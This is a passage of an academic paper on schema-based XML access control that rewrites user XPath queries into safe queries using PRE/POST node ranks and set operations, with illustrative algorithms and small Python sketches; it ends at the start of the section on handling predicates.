Xue Li. A Tutorial on Induction of Decision Trees, School of Information Technology and Electrical Engineering, University of Queensland, 2002.
14007, null], [14007, 18722, null], [18722, 23720, null], [23720, 28332, null], [28332, 31404, null], [31404, 35657, null], [35657, 40063, null], [40063, 43840, null], [43840, 48648, null], [48648, 53463, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 53463, null]], "pdf_page_numbers": [[0, 4449, 1], [4449, 9780, 2], [9780, 14007, 3], [14007, 18722, 4], [18722, 23720, 5], [23720, 28332, 6], [28332, 31404, 7], [31404, 35657, 8], [35657, 40063, 9], [40063, 43840, 10], [43840, 48648, 11], [48648, 53463, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 53463, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
cd69030b8a9541c80a1a532239a26961ba09c7db
A Schema Based Approach to Valid XML Access Control

CHANGWOO BYUN1 AND SEOG PARK2
1 Department of Computer Systems and Engineering, Inha Technical College, Incheon, 402-752 Korea
2 Department of Computer Science and Engineering, Sogang University, Seoul, 121-742 Korea

As Extensible Markup Language (XML) is becoming a de facto standard for the distribution and sharing of information, the need for efficient yet secure access to XML data has become very important. Access control environments for XML documents, together with techniques to deal with authorization priorities and conflict resolution, have been proposed. Despite this, relatively little work has been done to enforce access controls on XML databases in the case of query access. This work presents an approach to enforcing authorizations on XML documents via a filtering system that transforms a user query into a rewritten safe query. The basic idea is that a query, intersected with only the necessary access control rules, is modified into an alternative form that is guaranteed to have no access violations, using the metadata of XML schemas and the set operations supported by XPath 2.0. This access control mechanism is independent of the underlying XML database engine; it could therefore be built on top of any XML DBMS or work as a stand-alone service. The approach offers several further benefits, such as ease of implementation, small execution-time overhead, and fine-grained control. The experimental results clearly demonstrate the efficiency of the approach.

Keywords: XML data, XML schema, valid XML access control, access control mechanism, query rewriting

1. INTRODUCTION

As XML [1] is becoming a de facto standard for the distribution and sharing of information, several schemes for XML access control have been proposed. They can be classified into two major categories: view-based node filtering and non-view-based query rewriting techniques. View-based schemes [2-9] suffer from high maintenance and storage costs.
To remedy these shortcomings, researchers are pursuing non-view-based query rewriting schemes. Several pre-processing mechanisms have been proposed, such as Static Analysis [10], QFilter [11, 12], and Security View [13, 14]. The advantage of pre-processing methods is that they are independent of the underlying XML database engine, and thus could be built on top of any XML DBMS or work as stand-alone services. Despite this, relatively little work has been done to enforce access controls for XML databases in the case of query access. Developing an efficient mechanism for XML databases to control query-based access is therefore the central theme of this paper. We implemented the Secure Query Filter (SQ-Filter) system, which focuses on the abstraction of only the necessary access control rules and on query modification. Abstracting the necessary access rules requires an effective and efficient selection mechanism that picks out only the rules appropriate to a user query; the traditional access control enforcement mechanism for XML documents uses all access control rules corresponding to a query requestor. The basic notion pursued is one of encoding trees: the SQ-Filter system uses the PRE(order) and POST(order) ranks of access control rules and queries to map each (PRE, POST) pair onto a two-dimensional plane, the PRE/POST plane. Finding the necessary access control rules is then reduced to processing a few regions of this PRE/POST plane. Query modification is an efficient query rewriting mechanism that transforms an unsafe query into a safe yet correct one that respects the user's access control policies. Rewriting the query early on reduces query processing overhead: the allowed set of XML sub-trees is retrieved directly, rather than retrieved and then tested.
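The region idea can be sketched in a few lines of Python. The (PRE, POST) pairs below are illustrative values, not taken from the paper's figures: a rule whose target node lies in the PRECEDING or FOLLOWING region of the plane cannot overlap the query's subtree and can be discarded.

```python
# Sketch of selecting only the access control rules relevant to a query
# by comparing (PRE, POST) ranks on the PRE/POST plane.
# The (pre, post) pairs below are illustrative, not from the paper.

def region(q, r):
    """Classify rule target r = (pre, post) relative to query target q."""
    qpre, qpost = q
    rpre, rpost = r
    if (rpre, rpost) == (qpre, qpost):
        return "self"
    if rpre < qpre and rpost > qpost:
        return "ancestor"
    if rpre > qpre and rpost < qpost:
        return "descendant"
    if rpre > qpre and rpost > qpost:
        return "following"
    return "preceding"

def necessary_rules(query_target, rules):
    """Keep only SELF/ANCESTOR/DESCENDANT rules; PRECEDING/FOLLOWING
    rules cannot intersect the query's subtree."""
    return {name: pt for name, pt in rules.items()
            if region(query_target, pt) not in ("preceding", "following")}

rules = {"R1": (3, 8), "R2": (13, 18), "R3": (31, 30), "R6": (36, 33)}
query = (30, 38)                       # e.g. an open_auction target node
print(necessary_rules(query, rules))   # -> {'R3': (31, 30), 'R6': (36, 33)}
```

Only the rules whose targets fall inside the query's subtree region survive, which is exactly the reduction to "a few regions of the plane" described above.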
In NFA approaches [10-12], without the metadata of the XML Schema (DTD), the process of rewriting queries may be markedly slower and even incorrect, because more states are traversed to process “*” and “//”. The basic notion pursued here is DTD labeling and a simple label comparison. A “*” node is unnecessary if the DTD identifies the actual node between the node (i.e., parent node) before “*” and the node (i.e., child node) after “*”. In addition, the “//” axis is also unnecessary if the DTD shows that there is a single path from the node before “//” to the node after “//”; if so, the “//” axis is replaced with the deterministic sequence of “/” steps. This is essential to prevent the query rewriting processor from producing an incorrect query. We conducted an extensive experimental study which shows that the SQ-Filter system improves access decision time and generates a more exact rewritten query. The rest of the paper is organized as follows: Section 2 briefly reviews related work and describes its weaknesses. Section 3 reviews background knowledge, consisting of the semantics of a valid XML document, the role of XPath expressions in access control rules, access control policies, the definition of secure query rewriting in XML access control, and the PRE/POST structure. Section 4 introduces the architecture of the SQ-Filter system, which runs three components: the QUERY ANALYZER component, which acquires information from a query; the ACR FINDER component, which eliminates all the access control rules unnecessary for a query; and the QUERY EXECUTOR component, which produces a safe rewritten query by extending/eliminating query tree nodes and combining sets of nodes with the set operations. In section 5, we prove the correctness of the SQ-Filter system. Section 6 presents the results of our experiments, which reveal the effective performance of the SQ-Filter system. Finally, section 7 summarizes our work.
2. RELATED WORK

The authorizations for XML documents should be associated with protection objects at different granularity levels. In general, existing XML access control models assume access control rules specified as a quintuple (Subject, Object, Access-type, Sign, Type) [2-9]. The subject refers to the user or user group with authority, the object is an XML document or a specific portion of it, the access-type denotes the kind of operation, the sign can be positive (+) or negative (−), and the type is “R(ecursive)” or “L(ocal).” In the studies of E. Damiani et al. [2, 3], E. Bertino et al. [4-6], A. Gabilon and E. Bruno [7], and C. Farkas et al. [8, 9], the object part of an access control rule is associated with each XML document/DTD. Because of the hierarchical nature of XML, the notion of the scope of an access control rule is introduced in most current approaches. The scope can be (i) the node only, (ii) the node and its attributes, (iii) the node and its text node children, or (iv) the node, its attributes, all its descendants and their attributes. If the scope of a rule is (i) or (ii), the rule is called L(ocal); if its scope is (iii) or (iv), it is called R(ecursive). The traditional XML access control enforcement mechanism [2-9] mentioned above is view-based. W. Fan et al. [13, 14] introduced a virtual security view mechanism, which is provided to a user as a view DTD and is used for query rewriting. The security view, however, is based on the user and not the query; thus, the query-rewriting algorithm may make use of unnecessary parts of a security view. It provides a useful algorithm for computing the view using tree labeling. However, aside from its high cost and maintenance requirement, this algorithm is also not scalable to a large number of users. To remedy this view-based problem, M. Murata et al. [10] simply focused on filtering out queries that do not satisfy access control policies. J. M.
Jeon et al. [15] proposed an access control method that produces access-granted XPath expressions from the query XPath expression by using an access control tree (XACT), whose edges are a structural summary of XML elements and whose nodes contain access control XPath expressions. Since the XACT includes all users' access control rules, it is very complicated and leads to computation time overhead. B. Luo et al. [11] and P. Ayyagari et al. [12] took extra steps to rewrite queries in combination with related access control policies before passing the revised queries to the underlying XML query system for processing. However, the shared Nondeterministic Finite Automaton (NFA) involves many access control rules that are unnecessary from the query's point of view, which results in a time-consuming decision about whether the query should be accepted, denied, or rewritten. In addition, this approach is very inefficient for rewriting queries with the descendant-or-self axis (“//”) because of the exhaustive navigation of the NFA. Many queries on XML data have path expressions with “//” axes, because users may not be concerned with the structure of the data and intentionally write path expressions with “//” axes to get the intended results. W. Fan et al. [14] and E. Damiani [17] focused on a Deterministic Finite Automaton (DFA) based query rewriting approach, avoiding the many backtrackings inherent in NFAs and resolving the original schema disclosure. Although DFA approaches are theoretically efficient, there are no experimental results.

3. PRELIMINARY

We review background knowledge on the topic at hand, which consists of the semantics of a valid XML document, the role of XPath expressions in access control rules, access control policies, and the PRE/POST structure, which is the metadata of the SQ-Filter system.

3.1 XML

An XML document consists of elements, attributes, and text nodes. These elements collectively form a tree.
The content of each element is a sequence of elements (nested elements) or text nodes. An element has a set of attributes, each of which has a name and a value. Attributes provide additional information about elements, thus increasing the semantics one can specify for elements. The XML specification [1] defines two types of documents: well-formed and valid ones. A well-formed document must conform to the well-formedness rules of the specification. Valid documents, on the other hand, must not only be well formed but must also have a Document Type Definition (DTD) or XML Schema to which the well-formed document conforms. If users issue queries using XPath or XQuery, the query structure must conform to the DTD or XML Schema structure. In this work, we consider a valid XML document with a DTD.

3.2 XPath Expression and Access Control Rule

XPath is a path expression language over the tree representation of XML documents. A typical path expression consists of a sequence of steps. Each step works by following a relationship between nodes in the document: child, attribute, ancestor, descendant, etc. Any step in a path expression can also be qualified by a predicate, which filters the selected nodes. Meanwhile, XPath 2.0 [18] supports operations (i.e., UNION, INTERSECT, and EXCEPT) that combine two sets of nodes. Although these operations are technically non-path expressions, they are invariably used in conjunction with path expressions, so they are useful in transforming unsafe queries into safe ones. To enforce the fine-level granularity requirement, authorization models for regulating access to XML documents use XPath, which is a suitable language both for query processing and for the object part of an XML access control authorization.

3.3 Access Control Policies

In general, some hierarchical data models (e.g., the Object-Oriented Data Model, the XML Data Model, etc.) exploit the implicit authorization mechanism combining positive and negative authorizations [19].
An “open policy” grants a query for a node whose access-control information is not defined. A “closed policy,” on the other hand, denies a query for a node whose access-control information is not defined. A positive/negative authorization mechanism under the closed policy generally assumes that a subject has a null authorization on every object until explicitly authorized. For strict data security, we use “most specific precedence” as the propagation policy, “denials take precedence” as the conflict resolution policy, and the “closed policy” as the decision policy. The combination of negative authorizations with positive authorizations allows the definition of positive authorizations as exceptions to a negative authorization at a higher level in the granularity hierarchy. M. Murata et al. [10] called this combination “valid read accessibility views.” Similarly, the combination of a positive authorization with a negative one specifies exceptions to a positive authorization; this approach leads to the so-called “invalid read accessibility views.” In this paper, we chose “valid read accessibility views.” To ensure that an access control policy yields “valid read accessibility views” in a positive/negative authorization mechanism, we propose a new concept for generating access control rules, which we define as the “Integrity Rule of Access Control Rules.”

**Definition 1 [Integrity Rule of ACRs]** It is impossible for any node that is not in the scope of positive ACRs (Access Control Rules) to have negative ACRs.

3.4 PRE/POST Structure

An XPath expression [18] declares the query requirement by identifying the nodes of interest via the path from the root of the document to the elements which serve as the roots of the sub-trees to be returned [20]. The QFilter [11] defines these semantics as “answer-as-sub-trees.” We call the root of the sub-trees to be returned the target node.
**Definition 2 [Target Node]** The target node of a given XPath is the last node, excluding predicates. For example, the target node of the XPath /site/people/person is the person node; the target node of the XPath /site/regions/asia/item[@id="xxx"] is the item node. Fig. 1 (a) shows a portion of the auction DTD extracted from XMark [21], which we use as a running example in this paper. Fig. 1 (b) shows the nodes of the DTD tree assigned PRE(order) and POST(order) ranks. In general, if there exist positive access control rules ($ACRs^+$) and negative access control rules ($ACRs^-$), the safe rewritten query ($Q'$) against a query ($Q$) becomes [10, 11]:

\[ Q' = Q \text{ INTERSECT } ACRs^+ \text{ EXCEPT } ACRs^- = (Q \text{ INTERSECT } ACRs^+) \text{ EXCEPT } (Q \text{ INTERSECT } ACRs^-). \]

In this paper, we address two problems:

- First is the scope of the access control rules that are compared with the query. Here, $ACRs$ are all the access control rules of a user, whereas $ACRs_Q$ are only the access control rules relevant to a user query:

\[ Q' = Q \text{ INTERSECT } ACRs^+_Q \text{ EXCEPT } ACRs^-_Q = (Q \text{ INTERSECT } ACRs^+_Q) \text{ EXCEPT } (Q \text{ INTERSECT } ACRs^-_Q), \]

where $ACRs^+_Q \subseteq ACRs^+$ and $ACRs^-_Q \subseteq ACRs^-$.

- Second is the correctness of the rewritten query $(Q \text{ INTERSECT } ACR)$ in the presence of “*” or “//”.

The objective of the SQ-Filter system is to select only the necessary ACRs for processing a user query, and to rewrite the unsafe query into a new safe query. In this section, we propose the architecture of the SQ-Filter system and describe its core components.

4.1 The Architecture of the SQ-Filter System

The architecture of the SQ-Filter system is shown in Fig. 2. The primary input is a user query.
If an input query is accepted, the output may be the original input query or a modified query from which the conflicting or redundant parts of the original query have been filtered out. Otherwise, the query is rejected. The SQ-Filter system is divided into two parts. At compile time, the SQ-Filter system constructs the PPS of a DTD (section 3.4). It also constructs the ACR and PREDICATE databases. At run time, the SQ-Filter system runs three components, namely, the QUERY ANALYZER, the ACR FINDER, and the QUERY EXECUTOR.

Fig. 2. The architecture of the SQ-Filter system.

After a security officer determines the ACRs, each of whose object parts is an XPath expression as in Fig. 3, the ACR Converter stores the XPath information into the ACR and PREDICATE databases of Fig. 4 at compile time. Note that the PRE and POST columns may hold more than one entry. For example, the target node of R1 is item; the (PRE, POST) value set of item is (3, 8) and (13, 18), and this value set is stored into the PRE and POST columns, respectively. Moreover, R1 has one predicate ([location = 'xxxx']). The parent element of the predicate is item. The entry of the PRE-POST column is (3, 13), and the entries of the property, operator, and value columns are 'location', '=', and 'xxxx', respectively. Finally, P1, the Predicate ID, is stored into the P-link column of the ACRs database. The Ptr-ACR column points to the corresponding negative ACRs. In a similar way, the other ACRs are stored into the ACRs and PREDICATES databases.

4.2 QUERY ANALYZER Component

The objective of the QUERY ANALYZER (QA) is to acquire information from a query. First, the QA looks up the PPS and gets the (PRE, POST) pairs of the target node of the query. Second, the QA eliminates unsuitable (PRE, POST) pairs. Finally, the QA divides the query into sub-queries for each remaining (PRE, POST) pair and obtains the predicate information of each sub-query.
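The QA's two ingredients, PRE/POST numbering of the schema tree and pruning of unsuitable target-node candidates, can be sketched in Python. The nested-dict tree below is a toy schema, not the auction DTD of Fig. 1, and the pruning check follows the reading that every query step must be an ancestor of a surviving candidate.

```python
# PRE/POST numbering of a schema tree plus pruning of target-node
# candidates.  Toy schema, not the auction DTD of Fig. 1.

def rank(tree):
    """Return {tag: [(pre, post), ...]} for every occurrence of a tag,
    assigning PRE on entry and POST on exit of a depth-first walk."""
    ranks = {}
    counters = [0, 0]                      # [next pre, next post]
    def visit(name, children):
        pre = counters[0]; counters[0] += 1
        for child, sub in children.items():
            visit(child, sub)
        post = counters[1]; counters[1] += 1
        ranks.setdefault(name, []).append((pre, post))
    (root, kids), = tree.items()
    visit(root, kids)
    return ranks

def prune_targets(ranks, steps):
    """Keep a (pre, post) candidate of the last step only if every
    earlier step has an occurrence that is an ancestor of it."""
    *context, target = steps
    keep = []
    for tp, tq in ranks.get(target, []):
        if all(any(p < tp and q > tq for p, q in ranks.get(s, []))
               for s in context):
            keep.append((tp, tq))
    return keep

dtd = {"site": {"regions": {"asia": {"item": {"name": {}}}},
                "people": {"person": {"name": {}}}}}
r = rank(dtd)
# name occurs twice; only the occurrence under person survives for
# the path site/people/person/name.
print(prune_targets(r, ["site", "people", "person", "name"]))  # -> [(7, 4)]
```

The same numbering feeds the ACR FINDER later: once every schema node carries a (PRE, POST) pair, ancestor tests reduce to two integer comparisons.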
Given a query Q_1, /site/people/person[name="chang"]/phone, the target node of Q_1 is the phone node. The QA looks up the PPS and gets the (27, 24) value of the target node phone. Then it gets the (23, 26) value of the person node, which carries the predicate information (name, "=", "chang"). Note that there may also be more than one (PRE, POST) pair for the target node of a query. Let us take another query, /site//name, for example. The target node of the query is the name node, so the (PRE, POST) pairs of name are (8, 4), (18, 14), and (25, 22). In this case, the query is divided into three sub-queries Q_{11}, Q_{12}, and Q_{13} (Q = Q_{11} ∪ Q_{12} ∪ Q_{13}). The main idea is that the preorder (postorder) value of each node of a query must be less (greater) than that of the target node of the query. Fig. 5 shows the pruning algorithm that eliminates the unsuitable (PRE, POST) pairs of a query. Henceforth, a query refers to each sub-query.

4.3 ACR FINDER Component

The objective of the ACR FINDER (ACR-F) component is to eliminate all the ACRs unnecessary for a query. As shown in Fig. 6, namely the PRE/POST plane of ACRs, the target node of a query induces five partitions of the plane. Each partition has a special relation with the query.

Input: a query
Output: suitable (PRE, POST) values of the target node of the query
BEGIN
1. for each (Pr_tn, Po_tn) value of the target node of the query {
2.   for the (Pr_step, Po_step) value of each node of the query
3.     if not (Pr_step < Pr_tn and Po_step > Po_tn)
4.       break;                      // (Pr_tn, Po_tn) is unsuitable
5.   if no step caused a break, suitable (PRE, POST) set ← (Pr_tn, Po_tn)
6. }
END

Fig. 5. The Prune-TNs algorithm.

Fig. 6. Semantics of the PRE/POST plane of positive ACRs.

Let (Pr_Q, Po_Q), (Pr_ACR, Po_ACR), and (Pr_Q', Po_Q') be the (PRE, POST) values of a query Q, an ACR, and a safe rewritten query Q', respectively.
**Definition 3 [upper-right partition: FOLLOWING ACR]** FOLLOWING ACR means that the preorder and postorder values of an ACR are greater than those of a query, subject to Pr_Q < Pr_ACR and Po_Q < Po_ACR.

**Definition 4 [lower-left partition: PRECEDING ACR]** PRECEDING ACR means that the preorder and postorder values of an ACR are less than those of a query, subject to Pr_Q > Pr_ACR and Po_Q > Po_ACR.

The FOLLOWING and PRECEDING ACRs have no connection with the query Q. Thus, we can put these ACRs aside when processing the query Q.

**Definition 5 [upper-left partition: ANCESTOR ACR]** ANCESTOR ACR (including PARENT ACR) means that the preorder (postorder) value of an ACR is less (greater) than that of a query, subject to Pr_Q > Pr_ACR and Po_Q < Po_ACR.

**Definition 6 [lower-right partition: DESCENDANT ACR]** DESCENDANT ACR (including CHILD ACR) means that the preorder (postorder) value of an ACR is greater (less) than that of a query, subject to Pr_Q < Pr_ACR and Po_Q > Po_ACR.

**Definition 7 [SELF ACR]** SELF ACR means that the (PRE, POST) pair of an ACR is equal to that of a query, subject to Pr_Q = Pr_ACR and Po_Q = Po_ACR.

Given a query Q_2, the target node of Q_2 is an open_auction node. Recall the ACR database in Fig. 4. By the QA, the (PRE, POST) value of the target node open_auction is (30, 38). Only R_3 and R_6 are necessary ACRs for Q_2, because they are DESCENDANT ACRs of Q_2. R_1, R_2, R_4, and R_5 are PRECEDING ACRs of the query and are identified as unnecessary for Q_2. Fig. 7 shows the ACR-FINDER algorithm, which finds the DESCENDANT (or ANCESTOR or SELF) ACRs for a query.

**Theorem 1** The ACR-FINDER algorithm abstracts all related access control rules for a query.

**Proof:** Let (Pr_TN, Po_TN) be the (PRE, POST) value of the target node of a query Q. Suppose that SN is any node in the sub-nodes of Q.
Then the (PRE, POST) value of SN is as follows:

\[ Pr_{TN} < Pr_{SN} < Pr_{TN} + \text{SIZE}(TN), \quad Po_{\text{lastSiblingNodeOfTN}} < Po_{SN} < Po_{TN}. \] (1)

Suppose that FN is any node in the following nodes of Q. Then the (PRE, POST) value of FN is as follows:

\[ Pr_{TN} < Pr_{FN}, \quad Po_{TN} < Po_{FN}. \] (2)

In particular, the (PRE, POST) value of the first following node (first_FN) of Q is as follows:

\[ Pr_{\text{firstFN}} = Pr_{TN} + \text{SIZE}(TN) + 1. \] (3)

Thus, by Eqs. (1) and (2), \( Po_{SN} < Po_{TN} < Po_{FN} \), and by Eqs. (1) and (3), we obtain Eq. (4):

\[ Pr_{SN} < Pr_{TN} + \text{SIZE}(TN) < Pr_{\text{firstFN}} = Pr_{TN} + \text{SIZE}(TN) + 1. \] (4)

Eq. (4) means that the preorder value of any node SN in the sub-nodes of Q is less than that of the first following node (first_FN) of Q. Therefore, we obtain \( Pr_{SN} < Pr_{FN} \) and \( Po_{SN} < Po_{FN} \); that is, the FOLLOWING ACRs have no connection with the query, as was to be proven. The same holds for the PRECEDING ACRs. \( \Box \)

4.4 QUERY EXECUTOR Component

The goal of the QUERY EXECUTOR (QE) is to produce a rewritten safe query by extending/eliminating query tree nodes and combining sets of nodes with the set operations. The positive and negative ACRs passed on by the ACR-F are classified into three groups (SELF, ANCESTOR, and DESCENDANT ACRs). The simple process of the QE is as follows:

① Compare the query with each negative access control rule and produce a modified query.
② Combine the modified queries of ① by the UNION operation.
③ Compare the query with each positive access control rule and produce a modified query.
④ Combine the modified queries of ③ by the UNION operation.
⑤ Combine the result queries of ④ and ② by the EXCEPT operation.
⑥ Output the final result query of ⑤, \((Q \cap ACRs^+) \setminus (Q \cap ACRs^-)\).
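Abstracting each XPath expression to the set of nodes it selects, the six QE steps reduce to plain set algebra. A toy Python sketch, where the node IDs are illustrative only:

```python
# The QE pipeline, with Python sets standing in for the node sets
# selected by XPath expressions.  Node IDs are illustrative only.

def safe_result(query, positive_rules, negative_rules):
    """Union the positive rules, union the negative rules, then
    compute (Q INTERSECT ACRs+) EXCEPT (Q INTERSECT ACRs-)."""
    allowed = set().union(*positive_rules) if positive_rules else set()
    denied = set().union(*negative_rules) if negative_rules else set()
    return (query & allowed) - (query & denied)

q = {1, 2, 3, 4, 5}             # nodes selected by the user query
acr_pos = [{1, 2, 3, 4}]        # one positive rule
acr_neg = [{3}, {9}]            # two negative rules
print(sorted(safe_result(q, acr_pos, acr_neg)))   # -> [1, 2, 4]
```

With no positive rules the result is empty, which mirrors the closed policy: nothing is accessible until explicitly authorized.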
However, we can obtain a semantically more efficient process by using the access control groups, such as the ANCESTOR and DESCENDANT ACRs.

4.4.1 No predicates

If predicates are used neither in the query nor in the ACRs, there are five types of situation, as shown in Fig. 8. By the “Integrity Rule of ACRs” (Definition 1), the scope of a negative ACR must be included in the scope of a positive ACR. Type 1 means that the positive and negative ACRs are both ANCESTOR ACRs of the query; the result is an empty set. Type 2 means that a positive ACR is an ANCESTOR ACR controlling parts of the query, and no negative ACRs exist. Type 5 means that a positive ACR is a DESCENDANT ACR and no negative ACRs exist. For Types 2 and 5, the latter set is empty, so the result is the former set. Type 3 means that a positive ACR is an ANCESTOR ACR controlling parts of the query, while some (or all) of the negative ACRs are DESCENDANT ACRs. Type 4 means that both the positive and negative ACRs are DESCENDANT ACRs. For Types 3 and 4, the result is \((Q \cap ACRs^+) \setminus (Q \cap ACRs^-)\). One example involves a positive ACR ACR_1, two negative ACRs ACR_2 and ACR_3, and two queries Q_1 and Q_2:

ACR_1: /site (+); the (PRE, POST) value of the site node is (0, 50).
ACR_2: /site//asia (−); the (PRE, POST) value of the asia node is (2, 9).
ACR_3: /site//person/name (−); the (PRE, POST) value of the name node is (25, 22).
Q_1: /site//name; the (PRE, POST) values of the name node are (8, 4), (18, 14), and (25, 22). Thus, Q_1 is divided into three sub-queries: Q_{11} for (8, 4), Q_{12} for (18, 14), and Q_{13} for (25, 22).
Q_2: /site//person; the (PRE, POST) value of the person node is (23, 26).

The ACRs related to Q_{11} are ACR_1 and ACR_2. The ACR related to Q_{12} is ACR_1. The ACRs related to Q_{13} are ACR_1 and ACR_3. The ACRs related to Q_2 are ACR_1 and ACR_3.
Q_{11} and Q_{13} are Type 1, Q_{12} is Type 2, and Q_2 is Type 3. In the case of Type 1, the query should be rejected at once, because the scope of the query is included in the scope of a negative ACR. In the case of Type 2, authorized parts that have no connection with the query should be eliminated by the INTERSECT operation. In the case of Type 3, not only the authorized parts that have no connection with the query but also the unauthorized parts of the query should be eliminated by the EXCEPT operation. Another example involves two positive ACRs ACR_4 and ACR_6, a negative ACR ACR_5, and two queries Q_3 and Q_4:

ACR_4: /site/item (+); the (PRE, POST) values of the item node are (3, 8) and (13, 18).
ACR_5: /site/item/name (−); the (PRE, POST) values of the name node are (8, 4) and (18, 14).
ACR_6: /site/open_auction/annotation (+); the (PRE, POST) value of the annotation node is (35, 36).
Q_3: /site//america; the (PRE, POST) value of the america node is (12, 19).
Q_4: /site/open_auction; the (PRE, POST) value of the open_auction node is (30, 38).

The ACRs related to Q_3 are ACR_4 and ACR_5, while the ACR related to Q_4 is ACR_6. Therefore, Q_3 is Type 4 and Q_4 is Type 5. In the case of Types 4 and 5, the unauthorized parts of a query should be eliminated by the INTERSECT operation.

4.4.2 Handling Q INTERSECT ACR

The handling Q INTERSECT ACR algorithm is very simple. First, it decides on a standard XPath expression between the query and the ACR: the one whose target node has the larger PRE value and the smaller POST value. In fact, the standard XPath expression can be selected without additional computation while passing through the ACR-F: for an ANCESTOR ACR, the query is the standard XPath expression, whereas for a DESCENDANT ACR, the ACR is. Second, it replaces a wildcard “*” with an actual node name (element tag) and removes unnecessary “//” axes.
An “*” element is unnecessary if the DTD identifies the actual element between the element (i.e., parent node) before “*” and the element (i.e., child node) after “*”. In addition, the “//” axis is also unnecessary if the DTD shows that there is a single path from the element before “//” to the element after “//”; if so, the “//” axis is replaced with the deterministic sequence of “/” steps. Let us take as an example the standard XPath expression //regions/*/item/name. Since the (PRE, POST) value set of the target node (name) of the XPath expression is (8, 4) and (18, 14), the algorithm begins with (8, 4) and makes a temporal query, “/name”. In reverse order, it first meets the item node.

Input: PPS, a standard XPath expression, and (Pr, Po) of the target node of the XPath expression
Output: a safe rewritten query
BEGIN
1. temp_query := null string;
2. for reverse order of the standard XPath {
3.   if node is not “*” and not “//”
4.     temp_query := concatenate(“/node”, temp_query);
5.   else if node is “*” {
6.     find (Pr_former_node, Po_former_node, LEVEL_former_node) of the former node of “*”;
7.     find the (Pr_parent, Po_parent, LEVEL_parent) value set of the parent nodes of the former node;
8.     for each (Pr_parent, Po_parent, LEVEL_parent) value
9.       if (Pr_parent < Pr_former_node) and (Po_parent > Po_former_node) and (LEVEL_former_node − LEVEL_parent = 1)
10.      temp_query := concatenate(parent, temp_query); }
11.  else if node is “//” {
12.    find (Pr_former_node, Po_former_node, LEVEL_former_node) of the former node of “//”;
13.    latter_node := get the next node of the “//” node;
14.    if latter_node is an empty node {
15.      find and concatenate each parent node continuously into temp_query until the root node;
16.      break; }
17.    else {
18.      find the (Pr_latter_node, Po_latter_node, LEVEL_latter_node) value set of the latter node;
for each \((Pr_{latter \_node}, Po_{latter \_node}, LEVEL_{latter \_node})\) value 20. if \((Pr_{latter \_node} < Pr_{former \_node})\) and \((Po_{latter \_node} > Po_{former \_node})\) 21. \((LEVEL_{former \_node} - LEVEL_{latter \_node} = 1)\) 22. pass and break; 23. else if \((LEVEL_{former \_node} - LEVEL_{latter \_node} = 2)\) { 24. convert “/” into “/*” and find an actual node of “*”; 25. temp_query := concatenate(actual_node, temp_query); 26. break; } 27. } 28. find and concatenate each parent node continuously into temp_query before latter_node; 29. break; } 30. } // line 17 31. } // line 11 32. } // line 2 33. return safe_query := temp_query; END Fig. 9. The handling $Q_{INTERSECT\_ACR}$ algorithm. (i.e., “/item/name”) (Lines (3)-(4) in Fig. 9). If this algorithm meets the “**” node, it gets the former node (i.e., “/item/node (3, 8)). Then it finds one among many parent nodes of the former node by \(PRE_{parent} < PRE_{former \_node}, \ POST_{parent} > POST_{former \_node}, \) and \((LEVEL_{former \_node} - LEVEL_{parent}) = 1\). After which, the parent node links up the temporal query (i.e., “/asia/item/name”) (Lines (5)-(10) in Fig. 9). If this algorithm meets the “/” node, it gets the former node (i.e., “/regions/node (1, 20)) and the latter node. If the latter node is an empty node, this algorithm finds and links up each parent node into the temporal query until the root node (i.e., “/site/regions/asia/item/name”) (Lines (14)-(16) in Fig. 9). If the latter node exists, this algorithm compares each LEVEL value between the former node and the latter node. If \((LEVEL_{former \_node} - LEVEL_{latter \_node}) = 1\), the two nodes have a parent-child relation. Thus, “/” is converted into “/*” (Lines (21)-(22) in Fig. 9). If \((LEVEL_{former \_node} - LEVEL_{latter \_node}) = 2\), this algorithm converts “/” into “*” and finds an actual node of “**” (Lines (23)-(26) in Fig. 9). 
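The core lookup used throughout these cases, finding the actual parent of a node via its (PRE, POST, LEVEL) values as in Lines (5)-(10) of Fig. 9, can be sketched as follows; the function name, tuple layout, and sample PPS entries are illustrative assumptions, not the paper's code:

```python
# Illustrative sketch: resolving a "*" step to an actual element. The
# actual parent of a node is the candidate whose PRE is smaller, whose
# POST is larger, and whose LEVEL is exactly one less than the node's own.

def resolve_star(former, pps):
    """former: (PRE, POST, LEVEL) of the node after "*";
    pps: {element_name: [(PRE, POST, LEVEL), ...]} hash table of the DTD."""
    pre, post, level = former
    for name, occurrences in pps.items():
        for p, q, l in occurrences:
            if p < pre and q > post and level - l == 1:
                return name    # the unique parent element replaces "*"
    return None

# Hypothetical PPS fragment: asia (2, 9, 2) is the parent of item (3, 8, 3),
# so the "*" in //regions/*/item resolves to asia.
print(resolve_star((3, 8, 3), {"asia": [(2, 9, 2)], "regions": [(1, 20, 1)]}))  # -> asia
```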
If \((LEVEL_{former\_node} - LEVEL_{latter\_node}) > 2\), then the two nodes have an ancestor-descendant relation. Thus, this algorithm finds and links up each parent node into temp_query continuously before the latter node (Lines (27)-(29) in Fig. 9).

4.4.3 Handling predicates

